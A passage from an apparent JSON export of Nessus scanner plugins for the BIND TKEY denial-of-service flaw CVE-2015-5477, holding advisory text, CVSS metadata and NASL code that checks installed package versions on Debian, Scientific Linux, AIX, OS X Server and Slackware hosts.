script_id(85053);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"DSA\", value:\"3319\");\n\n script_name(english:\"Debian DSA-3319-1 : bind9 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering\nan assertion failure and causing BIND to exit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=793903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/bind9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/bind9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3319\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the bind9 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"bind9\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9-doc\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9-host\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"bind9utils\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"dnsutils\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"host\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbind-dev\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libbind9-80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libdns88\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisc84\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisccc80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libisccfg82\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"liblwres80\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"lwresd\", reference:\"1:9.8.4.dfsg.P1-6+nmu2+deb7u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9-doc\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9-host\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"bind9utils\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"dnsutils\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"host\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind-dev\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind-export-dev\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libbind9-90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns-export100\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns-export100-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libdns100\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libirs-export91\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libirs-export91-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc-export95\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc-export95-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisc95\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccc90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg-export90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg-export90-udeb\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libisccfg90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"liblwres90\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lwresd\", reference:\"1:9.9.5.dfsg-9+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:57", "description": "A flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bind on SL5.x i386/x86_64 (20150729)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bind", "p-cpe:/a:fermilab:scientific_linux:bind-chroot", "p-cpe:/a:fermilab:scientific_linux:bind-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel", "p-cpe:/a:fermilab:scientific_linux:bind-libs", "p-cpe:/a:fermilab:scientific_linux:bind-sdb", "p-cpe:/a:fermilab:scientific_linux:bind-utils", "p-cpe:/a:fermilab:scientific_linux:caching-nameserver", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150729_BIND_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/85120", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85120);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"Scientific Linux Security Update : bind on SL5.x i386/x86_64 (20150729)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nAfter installing the update, the BIND daemon (named) will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1507&L=scientific-linux-errata&F=&S=&P=13277\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?50e4fb33\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:06:14", "description": "ISC BIND is vulnerable to a denial of service, caused by an error in the handling of TKEY queries. By sending specially-crafted packets, a remote attacker could exploit this vulnerability to cause a REQUIRE assertion failure.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-18T00:00:00", "type": "nessus", "title": "AIX 5.3 TL 12 : bind9 (IV75966)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["cpe:/o:ibm:aix:5.3"], "id": "AIX_IV75966.NASL", "href": "https://www.tenable.com/plugins/nessus/85450", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory bind9_advisory8.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85450);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5477\");\n\n script_name(english:\"AIX 5.3 TL 12 : bind9 (IV75966)\");\n script_summary(english:\"Check for APAR IV75966\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ISC BIND is vulnerable to a denial of service, caused by an error in\nthe handling of TKEY queries. By sending specially-crafted packets, a\nremote attacker could exploit this vulnerability to cause a REQUIRE\nassertion failure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"12\", sp:\"09\", patch:\"IV75966s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"5.3.12.0\", maxfilesetver:\"5.3.12.10\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:05:59", "description": "The remote Mac OS X host has a version of OS X Server installed that is prior to 4.1.5. It is, therefore, affected by a denial of service vulnerability due to an assertion flaw that occurs when handling TKEY queries. A remote attacker can exploit this, via a specially crafted request, to cause a REQUIRE assertion failure and daemon exit, resulting in a denial of service condition.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "Mac OS X : OS X Server < 4.1.5 BIND DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x_server"], "id": "MACOSX_SERVER_4_1_5.NASL", "href": "https://www.tenable.com/plugins/nessus/85410", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85410);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_bugtraq_id(76092);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2015-08-13-4\");\n\n script_name(english:\"Mac OS X : OS X Server < 4.1.5 BIND DoS\");\n script_summary(english:\"Checks the OS X Server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a security update for OS X Server.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of OS X Server installed that\nis prior to 4.1.5. It is, therefore, affected by a denial of service\nvulnerability due to an assertion flaw that occurs when handling TKEY\nqueries. A remote attacker can exploit this, via a specially crafted\nrequest, to cause a REQUIRE assertion failure and daemon exit,\nresulting in a denial of service condition.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT205032\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OS X Server version 4.1.5 or later.\n\nNote that OS X Server 4.1.5 is available only for OS X 10.10.5 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_server_services.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Server/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Server/Version\");\n\nfixed_version = \"4.1.5\";\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"OS X Server\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:37:56", "description": "Versions of ISC BIND 9.x prior to 9.9.7-P2, 9.9.9-S3, 9.10.2-P3, and 9.10.3 are unpatched for a flaw that is triggered when handling TKEY queries. With a specially crafted request, a remote attacker can cause the named service to terminate.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-01-19T00:00:00", "type": "nessus", "title": "ISC BIND 9.x < 9.9.7-P2 / 9.9.8 / 9.9.8-S1 / 9.9.9-S3 / 9.10.2-P3 / 9.10.3 / 9.10.3rc DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:isc:bind:*:*:*:*:*:*:*:*"], "id": "9865.PRM", "href": "https://www.tenable.com/plugins/nnm/9865", "sourceData": "Binary data 9865.prm", "cvss": {"score": 7.8, "vector": "CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:24", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind (SSA:2015-209-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bind", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-209-01.NASL", "href": "https://www.tenable.com/plugins/nessus/85043", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-209-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85043);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"SSA\", value:\"2015-209-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bind (SSA:2015-209-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb5b6b3c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"x86_64\", pkgnum:\"1_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bind\", pkgver:\"9.9.7_P2\", pkgarch:\"i486\", pkgnum:\"1_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", 